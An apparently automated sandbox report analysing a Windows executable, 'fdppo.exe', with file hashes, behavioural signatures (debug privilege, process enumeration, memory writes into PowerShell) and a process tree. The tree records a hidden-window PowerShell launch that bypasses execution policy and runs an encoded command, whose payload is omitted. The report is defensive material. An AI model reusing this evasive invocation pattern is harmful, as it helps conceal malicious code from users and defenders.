Analysis
- max time kernel: 143s
- max time network: 144s
- platform: windows10_x64
- resource: win10
- submitted: 13-07-2020 14:36
Static task: static1
Behavioral task: behavioral1
- Sample: fdppo.exe
- Resource: win7 (windows7_x64)
- 0 signatures, 0 seconds
Behavioral task: behavioral2
- Sample: fdppo.exe
- Resource: win10 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: fdppo.exe
- Size: 101KB
- MD5: 082348ffb2977a0762e3e5d6f4a47ff4
- SHA1: a63f12bba792fd01307373a7565b96549eb9f3c8
- SHA256: 8f9fcdd00e43b8845139ba38f9d4f164e526736578eab199e7f7af5d8179f01c
- SHA512: ac00b157a3ae8af9502658c2fa72d80eb871f4ca9ee6b36393c526fbe0d35383855633bc871623c3088f3cdbd75a537b52ef24d8d1995353896637c3a27cf91c
Score: 3/10
Malware Config
Signatures
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes: fdppo.exe, WerFault.exe
  description                  pid   process
  Token: SeDebugPrivilege      3844  fdppo.exe
  Token: SeRestorePrivilege    2840  WerFault.exe
  Token: SeBackupPrivilege     2840  WerFault.exe
  Token: SeDebugPrivilege      2840  WerFault.exe
- Suspicious behavior: EnumeratesProcesses (16 IoCs)
  Processes: fdppo.exe, WerFault.exe
  pid   process
  3844  fdppo.exe
  3844  fdppo.exe
  2840  WerFault.exe
  2840  WerFault.exe
  2840  WerFault.exe
  2840  WerFault.exe
  2840  WerFault.exe
  2840  WerFault.exe
  2840  WerFault.exe
  2840  WerFault.exe
  2840  WerFault.exe
  2840  WerFault.exe
  2840  WerFault.exe
  2840  WerFault.exe
  2840  WerFault.exe
  2840  WerFault.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes: fdppo.exe
  description                       pid   process    target process
  PID 3844 wrote to memory of 2968  3844  fdppo.exe  powershell.exe
  PID 3844 wrote to memory of 2968  3844  fdppo.exe  powershell.exe
  PID 3844 wrote to memory of 2968  3844  fdppo.exe  powershell.exe
- Program crash (1 IoCs)
  Processes: WerFault.exe
  pid   pid_target  process       target process
  2840  2968        WerFault.exe  powershell.exe
Processes
C:\Users\Admin\AppData\Local\Temp\fdppo.exe
"C:\Users\Admin\AppData\Local\Temp\fdppo.exe" 1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3844
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e [Base64-encoded command omitted] 2⤵
PID:2968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2968 -s 696 3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Program crash
PID:2840